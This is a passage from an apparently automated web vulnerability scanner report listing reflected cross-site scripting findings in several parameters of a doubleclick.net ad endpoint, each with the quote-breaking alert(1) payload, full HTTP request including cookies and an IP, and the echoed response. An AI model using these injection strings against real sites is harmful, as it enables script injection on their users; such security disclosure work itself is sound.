clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=1002a3e0"-alert(1)-"5023a527418&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
pl
...[SNIP]...

3.437. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94289"-alert(1)-"5ac4cc0ee2e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=94289"-alert(1)-"5ac4cc0ee2e&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Ess
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=94289"-alert(1)-"5ac4cc0ee2e&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cd
...[SNIP]...

3.438. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f401e'-alert(1)-'2aa691d1759 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=f401e'-alert(1)-'2aa691d1759&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/r%3B240046691%3B4-0%3B0%3B61212128%3B4307-300/250%3B41645540/41663327/1%3B%3B%7Ess
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=f401e'-alert(1)-'2aa691d1759&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405540/clickthrough?noflash=true&noscript=true&site_id=7943
...[SNIP]...

3.439. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1952a"-alert(1)-"e57edee6b47 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=24041952a"-alert(1)-"e57edee6b47&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/n%3B240046691%3B7-0%3B0%3B61212128%3B4307-300/250%3B41645543/41663330/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=24041952a"-alert(1)-"e57edee6b47&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/
...[SNIP]...

3.440. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4c60'-alert(1)-'749bfe725fb was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404c4c60'-alert(1)-'749bfe725fb&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/y%3B240046691%3B1-0%3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Ess
...[SNIP]...
7/14a/%2a/y%3B240046691%3B1-0%3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404c4c60'-alert(1)-'749bfe725fb&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/
...[SNIP]...

3.441. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61cd2'-alert(1)-'008e0c83e0e was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24361cd2'-alert(1)-'008e0c83e0e&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Ess
...[SNIP]...
03941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24361cd2'-alert(1)-'008e0c83e0e&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405574/clickthrough?noflash=true&noscript=true&site_id=794364&placement_id=61212128\" target=\"_blank\
...[SNIP]...

3.442. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87d46"-alert(1)-"5f469ade8f7 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24387d46"-alert(1)-"5f469ade8f7&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Ess
...[SNIP]...
03941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24387d46"-alert(1)-"5f469ade8f7&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

document.write('\n\n<script src=\"http://cdn.royale.spongecell.com/api/placements/4640
...[SNIP]...

3.443. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 673bf"-alert(1)-"48b0cfefd7e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9673bf"-alert(1)-"48b0cfefd7e&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/r%3B240046691%3B4-0%3B0%3B61212128%3B4307-300/250%3B41645540/41663327/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9673bf"-alert(1)-"48b0cfefd7e&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364",
placementId: "61212128"
};

documen
...[SNIP]...

3.444. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea231'-alert(1)-'1e9e5057b03 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9ea231'-alert(1)-'1e9e5057b03&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/o%3B240046691%3B3-0%3B0%3B61212128%3B4307-300/250%3B41645537/41663324/1%3B%3B%7Ess
...[SNIP]...
41645537/41663324/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9ea231'-alert(1)-'1e9e5057b03&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/http://spongecell.com/api/placements/46405518/clickthrough?nof
...[SNIP]...

3.445. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80f35'-alert(1)-'e637fd23aec was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=50394180f35'-alert(1)-'e637fd23aec&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/t%3B240046691%3B0-0%3B0%3B61212128%3B4307-300/250%3B41645533/41663320/1%3B%3B%7Ess
...[SNIP]...
href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/t%3B240046691%3B0-0%3B0%3B61212128%3B4307-300/250%3B41645533/41663320/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=50394180f35'-alert(1)-'e637fd23aec&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5
...[SNIP]...

3.446. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98fa2"-alert(1)-"506730e0e55 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=50394198fa2"-alert(1)-"506730e0e55&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2070

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/h%3B240046691%3B6-0%3B0%3B61212128%3B4307-300/250%3B41645542/41663329/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=50394198fa2"-alert(1)-"506730e0e55&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5
...[SNIP]...

3.447. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2edb5"-alert(1)-"b77c08485d3 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=232edb5"-alert(1)-"b77c08485d3&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
